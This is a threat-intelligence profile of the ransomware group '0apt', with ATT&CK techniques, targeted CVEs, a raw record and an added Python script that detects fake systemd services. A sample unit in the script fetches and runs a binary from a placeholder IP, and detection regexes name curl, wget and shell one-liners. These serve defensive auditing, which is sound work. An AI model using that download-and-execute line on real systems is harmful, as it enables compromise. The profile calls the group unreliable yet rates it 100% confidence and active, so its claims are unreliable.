Threat Actor Profile
Low Cybercriminal
Description

The group appears unreliable. Most, if not all, of its alleged victims cannot be verified and appear to be randomly selected organizations. WE HAVE DECIDED TO REMOVE ENTRIES FOR THIS GROUP

Confidence Score
100%
Tags
ransomware ransomware.live
First Seen
Unknown
Last Updated
Unknown
Active Status
Active
Created
April 29, 2026
MITRE ATT&CK Techniques (6)
T1622 - Debugger Evasion
Defense Evasion
T1046 - Network Service Discovery
Discovery
T1106 - Native API
Execution
T1567.002 - Exfiltration to Cloud Storage
Exfiltration
T1190 - Exploit Public-Facing Application
Initial Access
T1543.002 - Systemd Service
Persistence
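The persistence technique listed above (T1543.002, described in the raw record as "creation of fake services on Linux systems") is one of the few entries in this profile a defender can check for directly on a host. The following audit is an added example, not code from ransomware.live, from this profile's data source, or from any 0apt sample: the heuristics (start commands living in temp or hidden paths, download-and-run one-liners, missing Description=, look-alike unit names), the short list of well-known unit names and the three unit texts are all constructed assumptions about what a fake service tends to look like.

```python
"""Audit systemd unit files for a fake/rogue service (ATT&CK T1543.002).

Added example for this profile, not code from ransomware.live or from any
0apt sample. Heuristics, look-alike list and unit texts are constructed.
"""
import difflib
import posixpath
import re

SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/run/user/")  # assumption
SUSPICIOUS_CMD_RE = re.compile(r"\b(curl|wget|base64|nohup|python3? -c|sh -c|bash -c)\b")
PATH_RE = re.compile(r"(?<![:\w/])/[\w.\-/]+")   # absolute paths in a command; skips the // of URLs
KNOWN_UNITS = ("systemd-journald.service", "systemd-resolved.service",   # constructed short list
               "NetworkManager.service", "cron.service", "ssh.service")


def parse_unit(text):
    """Unit text -> {section: {key: [values]}}; keys such as ExecStart may repeat."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            sections[current].setdefault(key, []).append(value)
    return sections


def is_hidden(path):
    """True if any path component starts with a dot, e.g. /tmp/.X11-unix/agent."""
    return any(p.startswith(".") for p in posixpath.normpath(path).split("/") if p)


def audit_unit(unit_name, text):
    """Findings for one unit file; an empty list means nothing looked wrong."""
    unit, findings = parse_unit(text), []

    def add(msg):
        if msg not in findings:
            findings.append(msg)

    for key, commands in unit.get("Service", {}).items():
        if not key.startswith("Exec"):          # ExecStartPre, ExecStart, ExecStopPost, ...
            continue
        for cmd in commands:
            for path in PATH_RE.findall(cmd):
                if path.startswith(SUSPICIOUS_DIRS):
                    add(f"{key} touches a temp/user-writable path: {path}")
                if is_hidden(path):
                    add(f"{key} touches a hidden path: {path}")
            if SUSPICIOUS_CMD_RE.search(cmd):
                add(f"{key} is a download/decode one-liner: {cmd}")
    if "Description" not in unit.get("Unit", {}):
        add("no Description= line (packaged units almost always have one)")
    for known in KNOWN_UNITS:                   # look-alike name, e.g. journa1d vs journald
        ratio = difflib.SequenceMatcher(None, unit_name.lower(), known.lower()).ratio()
        if unit_name != known and ratio > 0.85:
            add(f"unit name imitates {known}")
    return findings


def audit_units(units):
    """{unit_name: unit_text} -> {unit_name: findings}."""
    return {name: audit_unit(name, text) for name, text in units.items()}


SAMPLE_UNITS = {   # constructed: two rogue units and one legitimate one
    "systemd-journa1d.service": """\
[Unit]
Description=Journal Service
[Service]
ExecStart=/bin/sh -c "curl -fsS http://203.0.113.10/a -o /dev/shm/.agent && /dev/shm/.agent"
Restart=always
[Install]
WantedBy=multi-user.target
""",
    "kworker-helper.service": """\
[Service]
ExecStart=/tmp/.X11-unix/kworker --quiet
Restart=always
[Install]
WantedBy=multi-user.target
""",
    "cron.service": """\
[Unit]
Description=Regular background program processing daemon
[Service]
EnvironmentFile=-/etc/default/cron
ExecStart=/usr/sbin/cron -f -P $EXTRA_OPTS
Restart=on-failure
[Install]
WantedBy=multi-user.target
""",
}

if __name__ == "__main__":
    for name, findings in audit_units(SAMPLE_UNITS).items():
        print(name, "->", findings or "clean")
```

On a real host the same function would be run over every file under /etc/systemd/system, /run/systemd/system and each user's ~/.config/systemd/user, since those are the writable locations where a dropped unit lands; units under /usr/lib/systemd/system belong to packages and are better checked against the package manager's file lists. The name check is deliberately fuzzy and will need a per-host allowlist; the path checks are the higher-signal part.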
Raw Record (ransomware.live export, shown as a Python dict; not STIX)
{'added_date': '2026-01-28',
 'client': '2003264@sit.singaporetech.edu.sg',
 'description': 'The group appears unreliable. Most, if not all, of its '
                'alleged victims cannot be verified and appear to be randomly '
                'selected organizations. WE HAVE DECIDED TO REMOVE ENTRIES FOR '
                'THIS GROUP',
 'firstseen': None,
 'group': '0apt',
 'has_negotiations': False,
 'has_ransomnote': True,
 'lastseen': None,
 'locations': [{'available': True,
                'fqdn': 'oaptxiyisljt2kv3we2we34kuudmqda7f2geffoylzpeo7ourhtz4dad.onion',
                'slug': 'http://oaptxiyisljt2kv3we2we34kuudmqda7f2geffoylzpeo7ourhtz4dad.onion',
                'title': '404 - Compromised',
                'type': 'DLS'}],
 'negotiation_count': 0,
 'ransomnotes_count': 1,
 'tiaras_metadata': {'has_negotiations': False,
                     'has_ransomnote': True,
                     'locations': [{'available': True,
                                    'fqdn': 'oaptxiyisljt2kv3we2we34kuudmqda7f2geffoylzpeo7ourhtz4dad.onion',
                                    'slug': 'http://oaptxiyisljt2kv3we2we34kuudmqda7f2geffoylzpeo7ourhtz4dad.onion',
                                    'title': '404 - Compromised',
                                    'type': 'DLS'}],
                     'negotiation_count': 0,
                     'ransomnotes_count': 1,
                     'ransomware_live_group': '0apt',
                     'tools': {},
                     'url': 'https://www.ransomware.live/group/0apt',
                     'victims': 0,
                     'vulnerabilities': [{'CVE': 'CVE-2024-3400',
                                          'CVSS': 10.0,
                                          'Product': 'PAN-OS (Edge Firewalls)',
                                          'Vendor': 'Palo Alto Networks',
                                          'severity': 'CRITICAL'},
                                         {'CVE': 'CVE-2025-22457',
                                          'CVSS': 9.0,
                                          'Product': 'Ivanti ICS',
                                          'Vendor': 'Ivanti',
                                          'severity': 'CRITICAL'},
                                         {'CVE': 'CVE-2024-21887',
                                          'CVSS': 9.1,
                                          'Product': 'VPN Appliance',
                                          'Vendor': 'Ivanti',
                                          'severity': 'CRITICAL'},
                                         {'CVE': 'CVE-2025-61882',
                                          'CVSS': 9.8,
                                          'Product': 'Oracle E-Business Suite '
                                                     '(EBS)',
                                          'Vendor': 'Oracle',
                                          'severity': 'CRITICAL'}]},
 'tiaras_source': 'ransomware.live',
 'tools': {},
 'ttps': [{'tactic_id': 'TA0001',
           'tactic_name': 'Initial Access',
           'techniques': [{'technique_details': 'Exploitation of '
                                                'internet-facing applications '
                                                '(focus on firewalls and '
                                                'VPNs).',
                           'technique_id': 'T1190',
                           'technique_name': 'Exploit Public-Facing '
                                             'Application'}]},
          {'tactic_id': 'TA0002',
           'tactic_name': 'Execution',
           'techniques': [{'technique_details': 'Direct system calls to bypass '
                                                'EDRs based on API hooks.',
                           'technique_id': 'T1106',
                           'technique_name': 'Native API'}]},
          {'tactic_id': 'TA0003',
           'tactic_name': 'Persistence',
           'techniques': [{'technique_details': 'Creation of fake services on '
                                                'Linux systems (systemd).',
                           'technique_id': 'T1543.002',
                           'technique_name': 'Create or Modify System Process: '
                                             'Systemd Service'}]},
          {'tactic_id': 'TA0005',
           'tactic_name': 'Defense Evasion',
           'techniques': [{'technique_details': 'The 0apt payload contains '
                                                '"useless math" loops to delay '
                                                'sandbox analysis.',
                           'technique_id': 'T1622',
                           'technique_name': 'Debugger Evasion'}]},
          {'tactic_id': 'TA0007',
           'tactic_name': 'Discovery',
           'techniques': [{'technique_details': 'Use of custom tools that '
                                                'mimic legitimate monitoring '
                                                'traffic.',
                           'technique_id': 'T1046',
                           'technique_name': 'Network Service Scanning'}]},
          {'tactic_id': 'TA0010',
           'tactic_name': 'Exfiltration',
           'techniques': [{'technique_details': 'Sending data via HTTPS '
                                                'tunnels to legitimate AWS S3 '
                                                'instances.',
                           'technique_id': 'T1567.002',
                           'technique_name': 'Exfiltration Over Web Service: '
                                             'Exfiltration to Cloud '
                                             'Storage'}]}],
 'url': 'https://www.ransomware.live/group/0apt',
 'victims': 0,
 'vulnerabilities': [{'CVE': 'CVE-2024-3400',
                      'CVSS': 10.0,
                      'Product': 'PAN-OS (Edge Firewalls)',
                      'Vendor': 'Palo Alto Networks',
                      'severity': 'CRITICAL'},
                     {'CVE': 'CVE-2025-22457',
                      'CVSS': 9.0,
                      'Product': 'Ivanti ICS',
                      'Vendor': 'Ivanti',
                      'severity': 'CRITICAL'},
                     {'CVE': 'CVE-2024-21887',
                      'CVSS': 9.1,
                      'Product': 'VPN Appliance',
                      'Vendor': 'Ivanti',
                      'severity': 'CRITICAL'},
                     {'CVE': 'CVE-2025-61882',
                      'CVSS': 9.8,
                      'Product': 'Oracle E-Business Suite (EBS)',
                      'Vendor': 'Oracle',
                      'severity': 'CRITICAL'}]}